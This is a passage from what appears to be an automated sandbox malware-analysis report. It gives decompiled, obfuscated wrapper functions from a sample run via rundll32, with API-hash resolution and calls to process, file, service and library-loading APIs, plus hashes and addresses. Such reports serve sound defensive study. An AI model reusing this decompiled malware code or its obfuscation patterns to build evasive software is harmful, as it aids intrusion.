				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t29;
				intOrPtr* _t33;
				void* _t34;

				E0021602B(_t29);
				_v28 = 0x4fe02f;
				_v24 = 0x232390;
				_v20 = 0xf8460;
				_v16 = 0;
				_v12 = 0xf625;
				_v12 = _v12 >> 6;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 + 0xffffcc6f;
				_v12 = _v12 ^ 0xffffa5b6;
				_v8 = 0xe5cd;
				_v8 = _v8 + 0xffffae4d;
				_v8 = _v8 | 0xf8bbefe7;
				_v8 = _v8 ^ 0xf8bbcc9a;
				_t33 = E002207A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
				return _t34;
			}

0x0021c6e1
0x0021c6e6
0x0021c6f0
0x0021c6fc
0x0021c703
0x0021c706
0x0021c70d
0x0021c711
0x0021c715
0x0021c71c
0x0021c723
0x0021c72a
0x0021c731
0x0021c738
0x0021c751
0x0021c762
0x0021c768

APIs

SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 0021C762

Strings

/O, xrefs: 0021C6E6

Memory Dump Source

Source File: 00000008.00000002.2105763694.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000008.00000002.2105752776.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.2105819426.000000000022C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_210000_rundll32.jbxd

Yara matches

Similarity

API ID: FolderPath
String ID: /O
API String ID: 1514166925-1923427199
Opcode ID: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
Instruction ID: 368e049acd3fbf82153a8d53a9143e92210354e00549e693d66a1729611a1674
Opcode Fuzzy Hash: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
Instruction Fuzzy Hash: AD1133B290122DBBCB25DF95DC498EFBFB8EF04714F108188F90962210D3714B659BE0

Uniqueness

Uniqueness Score: -1.00%

Function 00211000, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E00211000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t33;
				struct HINSTANCE__* _t40;
				signed int _t42;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E0021602B(_t33);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x1b2eda;
				_v20 = 0x33a3b7;
				_v12 = 0x98c;
				_v12 = _v12 + 0xb426;
				_v12 = _v12 + 0x5beb;
				_t42 = 0x63;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x00000fce;
				_v8 = 0x120e;
				_v8 = _v8 + 0xfffffcb8;
				_v8 = _v8 + 0xffffefaa;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x07ff9a02;
				E002207A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
				_t40 = LoadLibraryW(_a12); // executed
				return _t40;
			}

0x00211006
0x00211009
0x0021100c
0x00211011
0x00211016
0x0021101d
0x00211026
0x0021102d
0x00211034
0x0021103b
0x00211047
0x0021104f
0x00211057
0x0021105e
0x00211065
0x0021106c
0x00211073
0x00211077
0x0021108b
0x00211096
0x0021109b

APIs

LoadLibraryW.KERNEL32(0033A3B7), ref: 00211096

Strings

[, xrefs: 0021103B

Memory Dump Source

Source File: 00000008.00000002.2105763694.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000008.00000002.2105752776.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.2105819426.000000000022C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_210000_rundll32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: [
API String ID: 1029625771-3431493590
Opcode ID: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
Instruction ID: 542211732888673dd6bd4a999da95d67d8dd94142be1235f0600662faada698f
Opcode Fuzzy Hash: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
Instruction Fuzzy Hash: 5B015BB6D01708BBDF04DF94C94A5DEBBB1AB54318F108188E41466291D3B19B649B91

Uniqueness

Uniqueness Score: -1.00%

Function 00214859, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00214859() {
				signed int _v8;
				signed int _v12;
				void* _t22;

				_v12 = 0xafe2;
				_v12 = _v12 * 0x42;
				_v12 = _v12 + 0xffffdd89;
				_v12 = _v12 ^ 0x002d198d;
				_v8 = 0x5b09;
				_v8 = _v8 | 0xa1ea9544;
				_v8 = _v8 * 0x12;
				_v8 = _v8 ^ 0x6283d9c1;
				E002207A9(0xc44181ea, 0x9164b7cc, _t22, _t22, 0x1a5);
				ExitProcess(0);
			}

0x0021485e
0x0021487a
0x0021487d
0x00214884
0x0021488b
0x00214892
0x0021489d
0x002148a0
0x002148ad
0x002148b7

APIs

ExitProcess.KERNELBASE(00000000), ref: 002148B7

Strings

[, xrefs: 0021488B

Memory Dump Source

Source File: 00000008.00000002.2105763694.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000008.00000002.2105752776.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.2105819426.000000000022C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_210000_rundll32.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID: [
API String ID: 621844428-1822564810
Opcode ID: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
Instruction ID: f34ee4eb2b485e945288599d497fbdc208df6c84720c6139dbff6cf129befafa
Opcode Fuzzy Hash: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
Instruction Fuzzy Hash: 8CF017B0A15209FBDB04CFE8DA9699EBFB9EB40301F20818CE444B7290E3B15F509B50

Uniqueness

Uniqueness Score: -1.00%

Function 00224F7D, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 32
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 66%

			E00224F7D(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t17;
				int _t24;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E0021602B(_t17);
				_v12 = 0xddd8;
				_v12 = _v12 * 0x48;
				_v12 = _v12 ^ 0x003e66d8;
				_v8 = 0xcb35;
				_v8 = _v8 ^ 0x7b88573c;
				_v8 = _v8 * 0x59;
				_v8 = _v8 ^ 0xf27e4a21;
				E002207A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
				_t24 = CloseHandle(_a4); // executed
				return _t24;
			}

0x00224f80
0x00224f81
0x00224f82
0x00224f86
0x00224f87
0x00224f8c
0x00224fa5
0x00224fa8
0x00224faf
0x00224fb6
0x00224fc7
0x00224fca
0x00224fd7
0x00224fe2
0x00224fe7

APIs

CloseHandle.KERNELBASE(003E66D8), ref: 00224FE2

Strings

{#lm, xrefs: 00224FC2

Memory Dump Source

Source File: 00000008.00000002.2105763694.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000008.00000002.2105752776.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.2105819426.000000000022C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_210000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID: {#lm
API String ID: 2962429428-1564096886
Opcode ID: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
Instruction ID: de85189ff0f10b7205e5618a1194342d1679db1f64d43c2e98040568b64fecc1
Opcode Fuzzy Hash: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
Instruction Fuzzy Hash: 8BF037B081120CFFDB04DFA4D98689EBFBAEB44300F208199E804AB250D3715B509B50

Uniqueness

Uniqueness Score: -1.00%

Function 0022976F, Relevance: 1.6, APIs: 1, Instructions: 63
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 21%

			E0022976F(void* __ecx, struct _PROCESS_INFORMATION* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct _STARTUPINFOW* _a20, int _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, intOrPtr _a56, WCHAR* _a60, WCHAR* _a68) {
				unsigned int _v8;
				signed int _v12;
				void* _t34;
				int _t39;
				struct _PROCESS_INFORMATION* _t48;

				_push(__ecx);
				_push(__ecx);
				_t48 = __edx;
				_push(0);
				_push(_a68);
				_push(0);
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0021602B(_t34);
				_v12 = 0xaff9;
				_v12 = _v12 | 0xcee54bd1;
				_v12 = _v12 + 0x6ed6;
				_v12 = _v12 ^ 0xcee61221;
				_v8 = 0x6229;
				_v8 = _v8 ^ 0x42aa9f31;
				_v8 = _v8 >> 2;
				_v8 = _v8 ^ 0x10aad83f;
				E002207A9(0xf0de9e9f, 0x9164b7cc, __ecx, __ecx, 0x155);
				_t39 = CreateProcessW(_a68, _a60, 0, 0, _a24, 0, 0, 0, _a20, _t48); // executed
				return _t39;
			}

0x00229772
0x00229773
0x00229778
0x0022977a
0x0022977b
0x0022977e
0x0022977f
0x00229782
0x00229785
0x00229788
0x00229789
0x0022978c
0x0022978f
0x00229790
0x00229791
0x00229794
0x00229797
0x0022979a
0x0022979d
0x002297a0
0x002297a3
0x002297a6
0x002297a7
0x002297a8
0x002297ad
0x002297b7
0x002297c3
0x002297ca
0x002297d1
0x002297d8
0x002297df
0x002297e3
0x002297fc
0x00229816
0x0022981d

APIs

CreateProcessW.KERNEL32(0021591A,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,0021591A), ref: 00229816

Memory Dump Source

Source File: 00000008.00000002.2105763694.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000008.00000002.2105752776.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.2105819426.000000000022C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_210000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
Instruction ID: 8af8b585893f82bc15f7c07b0853e93990054816491876dc31458a1a35a57156
Opcode Fuzzy Hash: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
Instruction Fuzzy Hash: 8111B372911148BBDF199FD6DC0ACDF7F7AEF89750F104148FA1556120D2768A60EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0021B566, Relevance: 1.6, APIs: 1, Instructions: 55
fileCOMMON

Download Yara Rule

C-Code - Quality: 31%

			E0021B566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
				unsigned int _v8;
				signed int _v12;
				void* _t32;
				void* _t38;
				long _t47;

				_push(__ecx);
				_push(__ecx);
				_push(_a48);
				_t47 = __edx;
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0);
				E0021602B(_t32);
				_v8 = 0xfd14;
				_v8 = _v8 >> 4;
				_v8 = _v8 * 0x7a;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x00002bef;
				_v12 = 0x4f26;
				_v12 = _v12 | 0xe7e97f76;
				_v12 = _v12 ^ 0xe7e94dbb;
				E002207A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
				return _t38;
			}

0x0021b569
0x0021b56a
0x0021b56d
0x0021b572
0x0021b574
0x0021b577
0x0021b57a
0x0021b57d
0x0021b580
0x0021b583
0x0021b586
0x0021b587
0x0021b58a
0x0021b58d
0x0021b590
0x0021b593
0x0021b594
0x0021b595
0x0021b59a
0x0021b5a4
0x0021b5b8
0x0021b5c0
0x0021b5c4
0x0021b5cb
0x0021b5d2
0x0021b5d9
0x0021b5e6
0x0021b5fd
0x0021b604

APIs

CreateFileW.KERNELBASE(00220668,?,?,00000000,?,?,00000000,?,?,?,047BBE06,00220668,?,?,?,?), ref: 0021B5FD

Memory Dump Source

Source File: 00000008.00000002.2105763694.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000008.00000002.2105752776.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.2105819426.000000000022C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_210000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
Instruction ID: 8c5b0151ff509629f37df0858bbc5671548eea907959aa7da7d1092e1be52d2d
Opcode Fuzzy Hash: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
Instruction Fuzzy Hash: 4211C372801248BBDF16DF95DD06CEE7FBAFF89314F148198FA1862120D3729A60EB50

Uniqueness

Uniqueness Score: -1.00%

Function 0022981E, Relevance: 1.5, APIs: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E0022981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				void* _t22;
				void* _t28;
				void* _t34;
				long _t37;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_t34 = __edx;
				_t37 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0021602B(_t22);
				_v12 = 0xe68;
				_v12 = _v12 * 0x39;
				_v12 = _v12 ^ 0xd1b1d871;
				_v12 = _v12 ^ 0xd1b2fb7e;
				_v8 = 0x629e;
				_v8 = _v8 + 0xfffff5da;
				_v8 = _v8 | 0xbef7b77b;
				_v8 = _v8 ^ 0xbef79fc3;
				E002207A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
				return _t28;
			}

0x00229821
0x00229822
0x00229825
0x00229828
0x0022982a
0x0022982c
0x0022982f
0x00229832
0x00229835
0x00229836
0x00229837
0x0022983c
0x00229855
0x00229858
0x0022985f
0x00229866
0x0022986d
0x00229874
0x0022987b
0x0022988e
0x0022989b
0x002298a2

APIs

RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00000001,?,?,?,002187F2,0000CAAE,0000510C,AD82F196), ref: 0022989B

Memory Dump Source

Source File: 00000008.00000002.2105763694.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000008.00000002.2105752776.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.2105819426.000000000022C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_210000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
Instruction ID: 136ff4b73406eac4840e75f5a7c5c464a2f8124889a7d21b5cd232603915ad96
Opcode Fuzzy Hash: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
Instruction Fuzzy Hash: C2014876801208BBDB04EFD5D8468DFBFB9EF85750F108199F918A6220E6715A619BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00227BF4, Relevance: 1.5, APIs: 1, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E00227BF4(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				void* _t24;
				int _t31;
				signed int _t33;
				struct _SHFILEOPSTRUCTW* _t40;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_t40 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0021602B(_t24);
				_v8 = 0xa117;
				_t33 = 0x76;
				_v8 = _v8 / _t33;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x210fe703;
				_v8 = _v8 ^ 0x210fdcea;
				_v12 = 0xf1e9;
				_v12 = _v12 << 9;
				_v12 = _v12 ^ 0x01e3a445;
				E002207A9(0x6b98377a, 0xd39e34db, _t33, _t33, 0x219);
				_t31 = SHFileOperationW(_t40); // executed
				return _t31;
			}

0x00227bf7
0x00227bf8
0x00227bfa
0x00227bfd
0x00227bff
0x00227c02
0x00227c06
0x00227c07
0x00227c0f
0x00227c1d
0x00227c25
0x00227c2d
0x00227c31
0x00227c38
0x00227c3f
0x00227c46
0x00227c4a
0x00227c5e
0x00227c67
0x00227c6d

APIs

SHFileOperationW.SHELL32(68CF93E9,?,?,?,?,?,?), ref: 00227C67

Memory Dump Source

Source File: 00000008.00000002.2105763694.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000008.00000002.2105752776.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.2105819426.000000000022C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_210000_rundll32.jbxd

Yara matches

Similarity

API ID: FileOperation
String ID:
API String ID: 3080627654-0
Opcode ID: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
Instruction ID: 4506c20672cf2cf3caec14a6ca0a9d6c1bf7f964dc28c20fa5fa43f13956cead
Opcode Fuzzy Hash: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
Instruction Fuzzy Hash: 7E014FB190120CFFEB09DF94D84A8DEBBB5EF44314F108198F40567240E7B15F609B91

Uniqueness

Uniqueness Score: -1.00%

Function 0021F65F, Relevance: 1.5, APIs: 1, Instructions: 40
serviceCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E0021F65F(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16, intOrPtr _a20) {
				unsigned int _v8;
				signed int _v12;
				void* _t24;
				void* _t29;
				int _t35;

				_push(__ecx);
				_push(__ecx);
				_push(_a20);
				_t35 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0021602B(_t24);
				_v12 = 0xd5a7;
				_v12 = _v12 ^ 0x994cba9d;
				_v12 = _v12 ^ 0x994c19d3;
				_v8 = 0xac88;
				_v8 = _v8 << 3;
				_v8 = _v8 >> 8;
				_v8 = _v8 + 0xebed;
				_v8 = _v8 ^ 0x0000ab82;
				E002207A9(0x1b506617, 0x2c3ac9a2, __ecx, __ecx, 0x18c);
				_t29 = OpenServiceW(_a16, _a12, _t35); // executed
				return _t29;
			}

0x0021f662
0x0021f663
0x0021f665
0x0021f668
0x0021f66a
0x0021f66d
0x0021f670
0x0021f673
0x0021f677
0x0021f678
0x0021f67d
0x0021f687
0x0021f693
0x0021f69a
0x0021f6a1
0x0021f6a5
0x0021f6a9
0x0021f6b0
0x0021f6c9
0x0021f6d8
0x0021f6de

APIs

OpenServiceW.ADVAPI32(BB1E804F,0000AB81,A536EF12), ref: 0021F6D8

Memory Dump Source

Source File: 00000008.00000002.2105763694.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000008.00000002.2105752776.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.2105819426.000000000022C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_210000_rundll32.jbxd

Yara matches

Similarity

API ID: OpenService
String ID:
API String ID: 3098006287-0
Opcode ID: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
Instruction ID: 106e2d8713a64ed87b02e2ca2f7615aa113f59112c714e2c671415f888782640
Opcode Fuzzy Hash: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
Instruction Fuzzy Hash: 9B01E5B6901208BBEF059F94DC4A8DF7F75EB05324F148188F90462250D6B25E61DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0021B6DD, Relevance: 1.5, APIs: 1, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0021B6DD(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				void* _t23;
				intOrPtr* _t27;
				void* _t28;

				E0021602B(_t23);
				_v12 = 0x9431;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x0000160f;
				_v8 = 0xc972;
				_v8 = _v8 ^ 0x829e0126;
				_v8 = _v8 + 0x4512;
				_v8 = _v8 + 0xffff18f9;
				_v8 = _v8 ^ 0x829e24c1;
				_t27 = E002207A9(0x6460e96, 0x9164b7cc, __ecx, __ecx, 0x114);
				_t28 =  *_t27(_a8, 0, _a16, 0x28, 0, __edx, 0x28, _a8, _a12, _a16, _a20, __ecx, __ecx); // executed
				return _t28;
			}

0x0021b6f3
0x0021b6f8
0x0021b702
0x0021b70b
0x0021b712
0x0021b719
0x0021b720
0x0021b727
0x0021b72e
0x0021b747
0x0021b759
0x0021b75e

APIs

SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 0021B759

Memory Dump Source

Source File: 00000008.00000002.2105763694.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000008.00000002.2105752776.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.2105819426.000000000022C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_210000_rundll32.jbxd

Yara matches

Similarity

API ID: FileHandleInformation
String ID:
API String ID: 3935143524-0
Opcode ID: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
Instruction ID: 82f69c0fac6d70267d21593f0c3ff8349d879125f3defbce7c14a7de5816fdb4
Opcode Fuzzy Hash: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
Instruction Fuzzy Hash: 150178B2940308FBEB45DF90DD06A9E7BB5EB18704F108188FA09261A0D3B25A20AB61

Uniqueness

Uniqueness Score: -1.00%

Function 0022AA3C, Relevance: 1.5, APIs: 1, Instructions: 34
fileCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0022AA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				signed int _v8;
				unsigned int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0021602B(_t21);
				_v12 = 0xcc49;
				_v12 = _v12 << 6;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0x000ca988;
				_v8 = 0x5d85;
				_v8 = _v8 | 0xb9d19a55;
				_v8 = _v8 * 0xd;
				_v8 = _v8 ^ 0x6fa87272;
				E002207A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
				_t27 = DeleteFileW(_a12); // executed
				return _t27;
			}

0x0022aa3f
0x0022aa40
0x0022aa41
0x0022aa44
0x0022aa47
0x0022aa4b
0x0022aa4c
0x0022aa51
0x0022aa5b
0x0022aa64
0x0022aa68
0x0022aa6f
0x0022aa76
0x0022aa8d
0x0022aa90
0x0022aa9d
0x0022aaa8
0x0022aaad

APIs

DeleteFileW.KERNELBASE(?,?,?,?,A6E18774,?,?), ref: 0022AAA8

Memory Dump Source

Source File: 00000008.00000002.2105763694.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000008.00000002.2105752776.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.2105819426.000000000022C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_210000_rundll32.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
Instruction ID: bda999c00b52578895d364b87efee0fbb129f381efd7f11970989b5c23b94233
Opcode Fuzzy Hash: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
Instruction Fuzzy Hash: 92F069B191020CFFDF08DF94DD4A89EBFB4EB44304F108088F805A6250D3B69B649B50

Uniqueness

Uniqueness Score: -1.00%

Function 00215FB2, Relevance: 1.5, APIs: 1, Instructions: 33
serviceCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00215FB2(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E0021602B(_t21);
				_v12 = 0x33d;
				_v12 = _v12 + 0xc3dc;
				_v12 = _v12 | 0x39ccfb02;
				_v12 = _v12 ^ 0x39ccf342;
				_v8 = 0xe8d9;
				_v8 = _v8 * 0x16;
				_v8 = _v8 | 0x4145347f;
				_v8 = _v8 ^ 0x9035ef96;
				_v8 = _v8 ^ 0xd1609914;
				E002207A9(0x6b3db31e, 0x2c3ac9a2, __ecx, __ecx, 0x1d5);
				_t27 = CloseServiceHandle(_a4); // executed
				return _t27;
			}

0x00215fb5
0x00215fb6
0x00215fb7
0x00215fbb
0x00215fbc
0x00215fc1
0x00215fcb
0x00215fd7
0x00215fde
0x00215fe5
0x00215ffc
0x00215fff
0x00216006
0x0021600d
0x0021601a
0x00216025
0x0021602a

APIs

CloseServiceHandle.ADVAPI32(39CCF342), ref: 00216025

Memory Dump Source

Source File: 00000008.00000002.2105763694.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000008.00000002.2105752776.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.2105819426.000000000022C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_210000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandleService
String ID:
API String ID: 1725840886-0
Opcode ID: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
Instruction ID: 5d995ea7630725837acdc99d8627ad3ff9cdb75dcbb2e3a096d8fe34c137cd10
Opcode Fuzzy Hash: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
Instruction Fuzzy Hash: C9F04FB0C11208FFDB08DFA0E94689EBFB8EB40300F20819CE409A7260E7715F559F54

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 2708 Parent PID: 2828 rundll32.exeCOMMON

Executed Functions

Function 00472959, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 62%

			E00472959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
				unsigned int _v8;
				signed int _v12;
				void* _t30;
				void* _t39;
				signed int _t41;
				signed int _t42;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(0);
				E0047602B(_t30);
				_v12 = 0x5e3c;
				_t41 = 0x63;
				_v12 = _v12 / _t41;
				_t42 = 0x2f;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x000064be;
				_v8 = 0x74da;
				_v8 = _v8 | 0xfefeeaea;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x000fb531;
				E004807A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
				_t39 = OpenSCManagerW(0, 0, _a16); // executed
				return _t39;
			}

0x0047295f
0x00472964
0x00472967
0x0047296a
0x0047296d
0x0047296e
0x0047296f
0x00472977
0x00472985
0x0047298a
0x00472992
0x0047299a
0x004729a2
0x004729a9
0x004729b0
0x004729b7
0x004729bb
0x004729cf
0x004729dc
0x004729e2

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 004729DC

Strings

<^, xrefs: 00472977

Memory Dump Source

Source File: 00000009.00000002.2107467849.0000000000471000.00000020.00000001.sdmp, Offset: 00470000, based on PE: true

Associated: 00000009.00000002.2107453809.0000000000470000.00000004.00000001.sdmp Download File
